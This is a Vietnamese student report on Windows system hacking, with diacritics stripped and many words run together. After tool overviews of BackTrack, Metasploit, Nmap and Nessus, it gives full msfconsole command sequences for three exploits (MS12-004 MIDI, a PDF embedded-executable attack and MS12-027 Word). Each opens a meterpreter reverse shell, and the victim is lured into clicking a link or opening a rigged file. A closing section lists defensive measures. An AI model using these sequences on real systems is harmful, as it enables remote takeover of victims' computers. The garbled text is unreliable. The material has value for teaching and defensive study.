1. TI: TN CNG H THNG SYSTEM HACKING SVTH: HONG THANH QU Trang 1
M U Theo thng k ca cng ty Bkav, t u nm 2013 n nay, ti Vit Nam c
2.405 website ca cc c quan, doanh nghip b xm nhp, trung bnh mi thng
c khong 300 website b tn cng. ng V Ngc Sn, Ph ch tch ph trch Nghin
cu pht trin caBkav cho bit, cc c quan doanh nghip b tn cng gn nh l
y , t t nghim trng n nghim trng v rt nghim trng (nhm nh cp cc ti
liu mt) v cc m c ny nhm c vo B Cng An, B Quc phng, ngn hng, cc c
quan n v nghin cu, cc doanh nghip Theo nhn nhn ca Bkav, c nhng chin
dch tn cng, pht tn m c c ch ch vo Vit Nam. Trong , bn thn cc v tn
cng trn mng v cc v xm nhp h thng cng ngh thng tin l nhm do thm, trc
li, ph hoi d liu, n cp ti sn, cnh tranh khng lnh mnh v mt s v mt an
ton thng tin s khc ang gia tng mc bo ng v s lng, a dng v hnh thc,
tinh vi hn v cng ngh. Trc tnh hnh , song songvic ban hnh
chth897/CT-TTg,Th Tng cho cc B, ngnh, a phng tng cng gii php m bo
an ton thng tin s. Th tng Chnh ph cng nu r, trong thi gian qua, tnh
hnh mt an ton thng tin s nc ta din bin phc tp, xut hin nhiu nguy c
e da nghim trng n vic ng dng cng ngh thng tin phc v pht trin kinh t
- x hi v m bo quc phng, an ninh. Bi bo co ny s gii thiu tng qut v
cc phng php m Hacker s dngtncngxmnhpvkhaithcvoccphinbnhiuhnh
Windows, h iu hnh ph bin nht hin nay ti Vit Nam, t gip chng ta nm r
cch thc m Hacker s dng v a ra cc gii php gip cho mi ngi dng c an
ton thng tin, bo mt trong thi i Internet ngy nay. Hong Thanh
Qu.
2. TI: TN CNG H THNG SYSTEM HACKING SVTH: HONG THANH QU Trang 2
LI CM N thc hin v hon thnh ti ny,trc ht ti xin cm n n cc thy V
Thng, ging vin hng dn sinh vin thc tp ti Trung tm o to qun tr mngv
an ninh mngquc t ATHENA, tn tnh ch bo trong thi gian va qua.
Ticngxin gi licm n ncc anh ch, bn b truyn t kinh nghim v to iu kin
cho ti hon thnh ti ny. Trong qu trnh thc hin tikhng thkhng c
nhngsai st, mong thyc ti trung tm ATHENA v cc bn thng thn gp ti
rtkinh nghim trong cc cng trnh tm hiu, pht trin sau ny. Hong Thanh
Qu.
3. TI: TN CNG H THNG SYSTEM HACKING SVTH: HONG THANH QU Trang 3
PHN 1: GII THIU 1.1 System Hacking v Tnh hnh an ninh mng Vit Nam
System hacking bao gm nhng k thut ly username, password da vo phn
mm ci trn h thng hoc tnh d ci t v chy cc dch v t xa ca h iu hnh
Windows. Nng quyn trong h thng, s dng keyloger ly thng tin, xa nhng
log file h thng. Mt khi xm nhp vo h thng, Hacker c th thc hin mi th
trn my tnh , gy ra nhng hu qu v cng nghim trng cho cc c nhn, t chc.
1.2 Cc l hng thng khai thc trong h iu hnh Windows Phn mm my tnh ngy
nay v cng phc tp, bao gm hng ngn dng m. Phn mm c vit ra bi con ngi,
nn cng chng c g l khi trong c cha nhng li lp trnh, c bit n vi tn gi
l hng. Nhng l hng ny c Hacker s dng xm nhp vo h thng, cng nh c tc
gi ca cc an m c dng khi ng chng trnh ca h mt cch t ng trn my tnh ca
bn. Hin nay cc l hng bo mt c pht hin cng nhiu trong cc h iu hnh, cc
Web Server hay cc phn mm khc, ... V cc hng sn xut lun cp nht cc l
hng v a ra cc phin bn mi sau khi v li cc l hng ca cc phin bn trc.
Do , ngi s dng phi lun cp nht thng tin v nng cp phin bn c m mnh ang
s dng nu khng cc Hacker s li dng iu ny tn cng vo h thng. Thng thng,
cc forum ca cc hng ni ting lun cp nht cc l hng bo mt v vic khai thc
cc l hng nh th no th ty tng ngi. Microsoft lun c nhng ci tin an
ninh vt tri qua mi phin bn mi ca h iu hnh Windows. Tuy nhin, mt s
tht l cc mi e da mng vn ang ngy cng pht trin nhanh hn so vi chu
trnh cp nht v i mi h iu hnh ca Microsoft. Ti phm mng thng s dng cc
l hng trong cc m chng trnh truy cp vo cc d liu v ti nguyn trn my
tnh b li bo mt. Cc chng trnh c hi
4. TI: TN CNG H THNG SYSTEM HACKING SVTH: HONG THANH QU Trang 4
c thit k c bit khai thc cc l hng ny, c gi l k thut exploit, ang ngy
cng ph bin nhanh chng. Nhng sn phm ca Microsoft thng gp phi cc l
hng bo mt nh HH
Windows,InternetExplorer,WindowsServer,MicrosoftExchangev.NetFramework.
1.3 Qu trnh tn cng vo mt h thng Trc tin ta s tm hiu tng qut mt qu
trnh tn cng h thng. Mc tiu pha trc ca chng ta l mt h thng my tnh.
Cc bc tn cng, nh sp n, c th c lit k nh hnh v bn cnh. N gm 6 cng on
nh sau: Enumerate (lit k): Trch ra tt c nhng thng tin c th v user
trong h thng. S dng phng php thm d SNMP c c nhng thng tin hu ch,
chnh xc hn.
5. TI: TN CNG H THNG SYSTEM HACKING SVTH: HONG THANH QU Trang 5
Crack: Cng on ny c l hp dn nhiuHackernht. Bc ny yu cu chng ta b kha
mt khu ng nhpcauser.Hocbngmtcchnokhc,mctiu phi t ti l quyn truy cp
vo h thng. Escalste (leo thang): Ni cho d hiu l chuyn i gii hn truy
cp t user binh thng ln admin hoc user c quyn cao hn cho chng ta tn
cng. Execute (thc thi): Thc thi ng dng trn h thng my ch. Chun b trc
malware, keylogger, rootkit chy n trn my tnh tn cng. Hide (n file):
Nhng file thc thi, file soucecode chy chng trnh Cn phi c lm n i,
trnh b mc tiu pht hin tiu dit. Tracks (du vt): Tt nhin khng phi l
li du vt. Nhng thng tin c lin quan n bn cn phi b xa sch, khng li bt
c th g. Nu khng kh nng bn b pht hin l k t nhp l rt cao. Tm li, qu
trnh tn cng h thng (System hacking) l bc tip theo sau qu trnh kho
st, thu thp thng tin ca mc tiu cn tn cng bng nhng k thut nh
Footprinting,Socialengineering,Enumeration,GoogleHackingcpdng cho
mc ch truy tm thng tin. Khi h thng mc tiu c xc nh, chng ta bt u i
vo qu trnh tn cnghthngthts.Taphitinhnhnhngkthutkhcnhaulmsaovo c
trong h thng , thc hin nhng vic m mnh mong mun, nh xa d liu, chy
chng trnh trojan, keylogger
6. TI: TN CNG H THNG SYSTEM HACKING SVTH: HONG THANH QU Trang 6
PHN 2: S DNG BACKTRACK KHAI THC XM NHP TRONG MNG LAN 2.1 H iu hnh
Backtrack 5 R3 Backtrack l mt bn phn phi dng Live DVD ca Linux, c
pht trin th nghim xm nhp. Backtrack l s hp nht gia 3 bn phn phi khc
nhau ca Linux v thm nhp th nghim IWHAX, WHOPPIX, v Auditor. Trong
phinbnhinti can(5),BacktrackcdatrnphinbnphnphiLinux Ubuntu 11.10.
Cng c Backtrack c lch s pht trin kh lu qua nhiu bn linux khc nhau.
Phin bn hin nay s dng bn phn phi Slackware linux (Tomas
M.(www.slax.org)). Backtrack lin tc cp nht cc cng c, drivers,...Hin
ti Backtrack c trn 300 cng c phc v cho vic nghin cu bo mt.
Backtrack l s kt hp gia 2 b cng c kim th bo mt rt ni ting l Whax v
Auditor. Backtrack 5 cha mt s cng c c th c s dng trong qu trnh th
nghim thm nhp ca chng ta. Cc cng c kim tra thm nhp trong Backtrack
5 c th c phn loi nh sau: Information gathering: loi ny c cha mt s
cng c c th c s dng c c thng tin lin quan n mt mc tiu DNS, nh tuyn,
a ch e-mail, trang web, my ch mail, v nh vy. Thng tin ny c th u thp
t cc thng tin c sn trn Internet, m khng cn chm vo mi trng mc tiu.
Network mapping: loi ny cha cc cng c c th c s dng kim tra cc host
ang tn ti, thng tin v OS, ng dng c s dng bi mc tiu, v cng lm
portscanning.
Vulnerabilityidentification:Trongthloiny,chngtacthtmthycc cng c qut
cc l hng (tng hp) v trong cc thit b Cisco. N cng cha cc cng c thc
hin v phn tch Server Message Block (SMB) vSimple Network Management
Protocol (SNMP).
7. TI: TN CNG H THNG SYSTEM HACKING SVTH: HONG THANH QU Trang 7
Web application analysis: loi ny cha cc cng c c th c s dng trong
theo di, gim st cc ng dng web. Radio network analysis: kim tra mng
khng dy, bluetooth v nhn dng tn s v tuyn (RFID), chng ta c th s dng
cc cng c trong th loi ny. Penetration: loi ny cha cc cng c c th c s
dng khai thc cc l hng tm thy trong cc my tnh mc tiu.
Privilegeescalation:Saukhikhaithccclhngvctruycpvocc my tnh mc tiu,
chng ta c th s dng cc cng c trong loi ny nng cao c quyn ca chng ta
cho cc c quyn cao nht. Maintaining access: Cng c trong loi ny s c
th gip chng ta trong vic duy tr quyn truy cp vo cc my tnh mc tiu.
Chng ta c th cn c c nhngc quyncaonhttrckhiccchngtacthcitcngcduytr
quyn truy cp. Voice Over IP (VOIP): phn tch VOIP chng ta c th s dng
cc cng c trong th loi ny. Digital forensics: Trong loi ny, chng ta
c th tm thy mt s cng c c th c s dng lm phn tch k thut nh c c hnh nh
a cng, cu trc cc tp tin, v phn tch hnh nh a cng. s dng cc cng c
cung cp trong th loi ny, chng ta c th chn Start Backtrack Forensics
trong trnh n khi ng. i khi s i hi chng ta phi gn kt ni b a cng v cc
tp tin trao i trong ch ch c bo tn tnh ton vn. Reverse engineering:
Th loi ny cha cc cng c c th c s dng g ri chng trnh mt hoc tho ri mt
tp tin thc thi. Chng ta c th ti bn Backtrack 5 ti a ch:
www.backtracklinux.org/downloads/
8. TI: TN CNG H THNG SYSTEM HACKING SVTH: HONG THANH QU Trang 8
2.2 Phn mm Metasploit Metasploit l mt d n bo mt my tnh cung cp cc
thng tin v vn l hng bo mt cng nh gip v kim tra thm nhp v pht trin h
thng pht hin tncngmng.MetasploitFrameworklmtmitrngdngkimtra,tn cngv
khai thc li ca cc service. Metasploit c xy dng t ngn ng hng
itngPerl,vinhngcomponentscvitbngC,assembler,vPython. Metasploit c
th chy trn hu ht cc h iu hnh: Linux, Windows, MacOS. Chng ta cth
download chng trnh ti www.metasploit.com. Metasploit h tr nhiu giao
din vi ngi dng:
Consoleinterface:dnglnhmsfconsole.Msfconsoleinterfacesdngcc dng lnh
cu hnh, kim tra nn nhanh hn v mm do hn.
Webinterface:dngmsfweb,giaotipvingidngthngquagiaodin Web. Command
line interface: dng msfcli. Metasploit Enviroment: Global
Enviroment: c thc thi thng qua 2 cu lnh setg v unsetg, nhng options
c gn y s mang tnh ton cc, c a vo tt c cc module exploits.
TemporaryEnviroment:cthcthithngqua2culnhsetvunset, enviroment ny ch
c a vo module exploit ang load hin ti, khng nh hng
nccmoduleexploitkhcChngcthlulienviromentmnhcu hnh thng qua lnh
save. Mi trng s c lu trong ./msf/config v s c load tr li khi user
interface c thc hin. S dng Metasploit Framework: a)Chn module
exploit: La chn chng trnh, dch v li m Metasploit c h tr khai thc
Show exploits: xem cc module exploit m framework c h tr. Use
exploit_name: chn module exploit.
9. TI: TN CNG H THNG SYSTEM HACKING SVTH: HONG THANH QU Trang 9
Info exploit_name: xem thng tin v module exploit. Chng ta nn cp nht
thng xuyn cc li dch v cng nh cc modul trn
www.metasploit.comhocqualnhmsfupdatehoc
svnupdat/opt/metasploit/msf3/. b)Cu hnh Module exploit chn: show
options: Xc nh nhng options no cn cu hnh. set : cu hnh cho nhng
option ca module . Mt vi module cn c nhng advanced options, chng ta
c th xem bng cch g dng lnh show advanceds. c)Verify nhng options va
cu hnh: check: kim tra xem nhng option c set chnh xc cha. d)La chn
target: show targets: nhng target c cung cp bi module . set: xc nh
target no. e)La chn payload: show payloads: lit k ra nhng payload
ca module exploit hin ti. info payload_name: xem thng tin chi tit v
payload . setpayloadpayload_name:xcnhpayloadmodulename.Saukhilachn
payload no, dng lnh show options xem nhng options ca payload . show
advanced: xem nhng advanced options ca payload . g)Thc thi exploit:
exploit:lnhdngthcthipayloadcode.Payloadsauscungcpcho chng ta nhng
thng tin v h thng c khai thc.
10. TI: TN CNG H THNG SYSTEM HACKING SVTH: HONG THANH QU Trang
10 2.3 S tng quan h thng mng LAN Trong mt mng LAN ni b, cc my tnh
thng kt ni vi nhau vi khong cch vt l gn nh trong mt phng, mt tng,
mt ta nh, cng ty, Cc my tnh
trongmngLANcthchiastinguynvinhau,minhnhlchiastp tin, my in, my qut
v mt s thit b khc. Khi mt my tnh trong mng LAN, n c th s dng cc
chng trnh, phn mm qut h thng mng bit c a ch IP cc host c trong mng.
Nmap(NetworkMapper)lmttinchngunmminphchophthin mng v kim ton an
ninh. Nmap v Zenmap (Cng c h tr ha ca nmap) c ci t sn trong
BackTrack, s dng cc gi tin IP gip xc nh host no c sn trn mng,
ccdchv(tnngdngvphinbn)mhostangcungcp,hiu
hnhg(vccphinbnhiuhnh)mhangchy,loiblcgitinhoc tng la no ang s dng, v
nhiu c im khc. Nmap chy c trn tt c cc h iu hnh, v cc gi nh phn chnh
thc c sn cho Linux, Windows, v Mac OS X. Sau khi xc nh c cc host c
trong mng, ta c th s dng cc cng c qut li h thng xc nh l hng ca h
thng mun xm nhp, t khai thc truy cp
11. TI: TN CNG H THNG SYSTEM HACKING SVTH: HONG THANH QU Trang
11 vo h thng. Mt trong s cc cng c qut li ny l Nessus, download ti a
ch http://www.nessus.org/. Mtkhixmnhpthnhcngvchimctonquyniukhinh
thng,Hackercththchinmivictrnmynnnhnnhdown/uploadfiles,
thayicutrchthng,thcthichngtrnh,nhcpmtkhu,citrojan/ backdoor, 2.4 Xm
nhp v khai thc Windows XP 2.4.1 L hng s dng: Ms12_004 Khi ng
msfconsole t ca s terminal ca BackTrack. Khai bo l hng s dng v thit
t options: Search ms12_004 use
exploit/windows/browser/ms12_004_midi show options set SRVHOST
192.168.159.128 set PAYLOAD windows/meterpreter/reverse_tcp set
LHOST 192.168.159.128 exploit
12. TI: TN CNG H THNG SYSTEM HACKING SVTH: HONG THANH QU Trang
12 BackTrack s to ra mt link cha m c (http
://192.168.159.128:4444). Ch cn nn nhn nhp chut vo link trn th
BackTrack s t dng gi m c sang my nn nhn v sau c th xem thng tin,
chin quyn ca my nn nhn . Tin hnh khai thc my nn nhn c IP:
192.168.159.130 port 1078.
13. TI: TN CNG H THNG SYSTEM HACKING SVTH: HONG THANH QU Trang
13 sessions sessions i 1 getuid sysinfo Hacked: khai thc thnh cng
li ms12_004 trn winXP SP2. Nn nhn : Computer: QUYDONGN 3B5D9F. Os:
Windows XP (Build 2600. Service Pack 2). Architecture: x86.
Systemlanguage: en US. Meterpreter: x86/win32.
14. TI: TN CNG H THNG SYSTEM HACKING SVTH: HONG THANH QU Trang
14 2.4.2 L hng s dng thng qua file PDF Khi ng msfconsole t ca s
terminal ca BackTrack. Khai bo l hng s dng v thit t options: Search
nojs use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
show options set FILENAME hack.pdf set payload
windows/meterpreter/reverse_tcp set LHOST 192.168.136.128 set LPORT
4444 exlpoit Backtrack thng bo to thnh cng 1 file hack.pdf nm trong
th mc /root/ms4/local/. use multi/hanler set payload
windows/meterpreter/reverse_tcp
15. TI: TN CNG H THNG SYSTEM HACKING SVTH: HONG THANH QU Trang
15 set LHOST 192.168.136.128 exploit Backtrack thng bo sn sng cho
vic tn cng. Chng ta s gi file hack.pdf va to ra trc cho nn nhn. Nu
nn nhn m file hack.pdf th Backtrack s gi cc m c sang my nn nhn ly
thng tin v chim quyn iu khin my nn nhn.
16. TI: TN CNG H THNG SYSTEM HACKING SVTH: HONG THANH QU Trang
16 Backtrack thng bo c 1 sessions m file hack.pdf l my c a ch IP
192.168.136.128 port 1037 v gi 752128 file m c sang my nn nhn. Tip
theo chng ta s kim tra thng tin my nn nhn. sysinfo
17. TI: TN CNG H THNG SYSTEM HACKING SVTH: HONG THANH QU Trang
17 Hacked: khai thc thnh cng thng qua li file PDF trn winXP SP2 Nn
nhn: Computer: HUUANHH 9091FB1. Os: Windows XP (Build 2600. Service
Pack 2). Architecture: x86. Systemlanguage: en US. Meterpreter:
x86/win32. 2.4.3 L hng s dng thng qua file Word 2007 Khi ng
msfconsole t ca s terminal ca BackTrack. Khai bo l hng s dng v thit
t options: Search ms12_027 use
exploit/windows/fileformat/ms12_027_mscomctl_bof show options set
FILENAME hack.doc set payload windows/meterpreter/reverse_tcp set
LHOST 192.168.1.104 exlpoit
18. TI: TN CNG H THNG SYSTEM HACKING SVTH: HONG THANH QU Trang
18 Backtrack thng bo to thnh cng 1 file hack.pdf nm trong th mc
/root/ms4/local/. use exploit/multi/hanler set payload
windows/meterpreter/reverse_tcp set LHOST 192.168.1.104
exploit
19. TI: TN CNG H THNG SYSTEM HACKING SVTH: HONG THANH QU Trang
19 Backtrack thng bo sn sng cho vic tn cng. Chng ta s gi file
hack.doc va to ra trc cho nn nhn. Nu nn nhn m file hack.doc th
Backtrack s gi cc m c sang my nn nhn ly thng tin v chim quyn iu
khin my nn nhn.
20. TI: TN CNG H THNG SYSTEM HACKING SVTH: HONG THANH QU Trang
20 Backtrack thng bo c 1 sessions m file hack.doc l my c a ch IP
192.168.1.104 port 4444 v gi 752128 file m c sang my nn nhn. Tip
theo chng ta s kim tra thng tin my nn nhn. sysinfo Hacked: khai thc
thnh cng thng qua li file Word 2007 trn winXP SP2. Nn nhn:
Computer: QUYDONGN 3B5D9F. Os: Windows XP (Build 2600. Service Pack
2). Architecture: x86. Systemlanguage: en US. Meterpreter:
x86/win32.
21. TI: TN CNG H THNG SYSTEM HACKING SVTH: HONG THANH QU Trang
21 PHN 3: TNG KT Vi nhng kiu tn cng h thng da trn nhng li sai st
trong qu trnh s dng my tnh hoc cc li v bo mt vt l, c mt s phng php
nhm gim thiu v phng trnh vic Hacker nh cp mt khu nh sau: Mt khu phi
c t nhiu hn 8 k t v phi l tng hp gia ch hoa, ch thng, s v k t c bit
cc chng trnh kh d ra. Cu hnh trong registry cho mt khu trong h thng
windows ch c bm v lu di dng NTLM cc chng trnh kh khn d tm. Bt ln 1
kho:
HKEY_LOCAL_MACHINES/SYSTEM/CurrentControlSetControlLsaNoLMHash. Ngi
dng Admin nn xo tp tin sam trong th mc Windows/repair sau mi ln
backup d liu bng rdisk. Trong qu trnh s dng my tnh truy cp
Internet. Ngi dng cn lu : Khng m tp tin nh km th in t c ngun gc
khng r rng hoc khng tin cy. Chc chn rng bn c v bt h thng tng la cho
h thng ca mnh. m bo Windows ca bn c cp nht thng xuyn, phn mm bo mt
ca bn c chc nng cp nht live (t ng cp nht trc tuyn). Microsoft xy
dng mt lot cc cng c trong Windows cc nh qun tr cng nh ngi dng c
kinh nghim c th phn tch chic my tnh ca mnh xem liu n c ang b xm phm
hay khng. Mt khi nghi ng my tnh ca mnh b xm nhp, ngi dng c th s dng
cc cng c ny t kim tra my tnh ca mnh khi c nhng biu hin ng ng: WMIC,
lnh net, Openfiles, Netstat, Find.
22. TI: TN CNG H THNG SYSTEM HACKING SVTH: HONG THANH QU Trang
22 PHN 4: TI LIU THAM KHO [1] Nguyn Sn Kh, Tn Pht, Nguyn Cao Thng,
Athena S dng BackTrack 5R3 khai thc l hng mng. [2] System Hacking
http://timtailieu.vn/tai-lieu/bai-giang-system-hacking-27060/. [3]
Th vin trng i hc Cng Ngh Thng Tin Tn cng h thng
http://www.citd.edu.vn/Vietnam/Home/index.php/tuyensinh/k-thut-tncong/29-tn-cong-h-
thng-system-hacking?lang=.